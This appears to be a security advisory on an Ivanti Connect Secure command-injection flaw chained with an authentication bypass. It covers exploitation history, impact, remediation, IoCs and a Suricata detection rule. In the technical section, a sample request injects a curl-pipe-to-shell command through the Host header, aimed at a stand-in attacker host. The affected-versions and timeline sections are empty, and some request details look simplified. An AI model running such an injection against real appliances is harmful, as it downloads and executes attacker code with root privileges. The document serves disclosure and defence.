CVE-2024-21887: Ivanti Connect Secure — Authenticated Command Injection

Background

Ivanti Connect Secure (formerly Pulse Secure) is a widely-deployed SSL VPN solution used by governments, Fortune 500 companies, and critical infrastructure operators worldwide. Policy Secure is Ivanti’s network access control solution sharing a common codebase. Together, these products gate access to internal networks for remote workers and third-party vendors, making them extremely high-value targets — successful exploitation provides an attacker with a foothold directly at the network perimeter.

CVE-2024-21887 was disclosed by Ivanti on January 10, 2024, as part of a pair of vulnerabilities alongside CVE-2023-46805. While CVE-2024-21887 technically requires authentication to exploit, threat actors immediately chained it with the authentication bypass (CVE-2023-46805) to achieve fully unauthenticated remote code execution. By the time the advisory was published, Volexity had already documented exploitation in the wild dating back to December 2023.

Technical Mechanism

CVE-2024-21887 is a command injection vulnerability in the web component of Ivanti Connect Secure. The affected endpoint accepts user-supplied data that is passed directly to system commands without adequate sanitisation.

Specifically, the vulnerability exists in several administrative API endpoints accessible via HTTPS. The Host header or specific request parameters submitted to these endpoints are incorporated into shell commands executed by the appliance’s underlying operating system. An attacker with valid administrative credentials can inject shell metacharacters (;, |, $(), backticks) to break out of the intended command context:

GET /api/v1/totp/user-backup-code/../../system?cmd=id HTTP/1.1
Host: target.example.com; curl${IFS}attacker.com/payload|sh
Authorization: Bearer <stolen_or_default_token>

When chained with CVE-2023-46805 (an authentication bypass in the /api/v1/auth endpoint that uses path traversal to circumvent authentication checks), the exploit chain becomes:

1. Step 1 (CVE-2023-46805): Send a crafted request to bypass authentication and obtain or impersonate an authenticated session.
2. Step 2 (CVE-2024-21887): Use the injected session to call a vulnerable administrative endpoint with a command payload embedded in a header or parameter.
3. Step 3: The underlying Perl/Python script on the appliance executes the injected command as root.

The appliances run a hardened Linux environment, but the web service runs as root, so command execution is immediately at the highest privilege level.

Real-World Exploitation Evidence

Volexity first documented exploitation of this chain in early December 2023, weeks before the public advisory. The threat group, tracked by Volexity as UTA0178 and subsequently linked to Chinese state-sponsored actors, deployed a custom web shell dubbed GLASSTOKEN.

Key documented activity:

• GLASSTOKEN: A lightweight web shell written in Perl, installed in the appliance’s web root, providing persistent command execution. The malware modified legitimate Ivanti components to survive integrity checks.
• LIGHTWIRE and ZIPLINE: Mandiant documented additional malware families deployed post-exploitation, including passive backdoors that listen on raw network sockets to avoid triggering web server logs.
• Credential harvesting: Attackers extracted cached VPN credentials, Active Directory credentials passed through the appliance, and SAML signing certificates — enabling lateral movement into the target’s internal network.
• Widespread exploitation: CISA issued an emergency directive (ED 24-01) requiring all federal agencies to immediately disconnect affected Ivanti products or apply mitigations. Over 1,700 appliances were found compromised globally within weeks of disclosure.

Impact Assessment

Successful exploitation of this chain provides root-level code execution on the VPN appliance, which sits at the network boundary. Immediate impacts include:

• Full credential interception: All VPN authentication traffic passes through the appliance; attackers can harvest plaintext credentials.
• Session hijacking: Active VPN sessions can be hijacked, providing access to internal network segments those users are authorised for.
• Lateral movement staging: The appliance is typically trusted internally; attackers use it as a pivot point for scanning and attacking internal systems.
• Persistence that survives factory reset: Mandiant documented malware that survived the factory reset process by persisting in a partition not wiped during reset operations.
• SAML certificate theft: If the appliance is configured as a SAML IdP or SP, attackers can exfiltrate signing certificates, enabling token forgery attacks against downstream services.

Affected Versions

Note: Ivanti initially released workarounds via an XML configuration import before full patches were available.

Remediation Steps

1. Apply patches immediately: Upgrade to the fixed versions listed above via the Ivanti download portal. Ivanti released patches on a rolling basis starting in late January 2024.

2. Run the Integrity Checker Tool (ICT): Ivanti released a dedicated ICT to detect signs of compromise before patching. Run it against all appliances:

   # Via Ivanti admin UI: Maintenance > Diagnostics > Integrity Check

3. Factory reset before patching: CISA and Ivanti both recommend performing a factory reset before applying patches if compromise is suspected, as the malware may persist across software upgrades.

4. Revoke and rotate all credentials: Treat all credentials that have passed through the appliance as compromised. This includes VPN user credentials, service accounts, and any SAML certificates.

5. Apply Ivanti’s XML mitigation file: As a temporary workaround before patching, import Ivanti’s published mitigation XML file to disable affected endpoints.

6. Enable Ivanti’s external ICT: A cloud-based integrity check tool was released to detect newer malware variants that the local ICT missed.

Detection Guidance

Key log sources:

• Ivanti Connect Secure system logs (/var/log/messages, /var/log/web.log)
• Network flow logs showing unusual outbound connections from the appliance
• EDR/NDR alerts on the internal network for pivot activity

Indicators of Compromise:

• Unexpected .pl, .py, or .cgi files in /home/webserver/htdocs/
• Modifications to /etc/cron.d/ entries
• Outbound connections from the appliance to non-corporate IPs on ports 443, 4444, or 8443
• Log entries showing requests to /api/v1/totp/user-backup-code/ with path traversal sequences

Suricata signature:

alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"Ivanti Connect Secure CVE-2024-21887 Exploit Attempt"; flow:established,to_server; http.uri; content:"/api/v1/totp/user-backup-code/"; content:"../"; distance:0; sid:9000021; rev:1;)

Timeline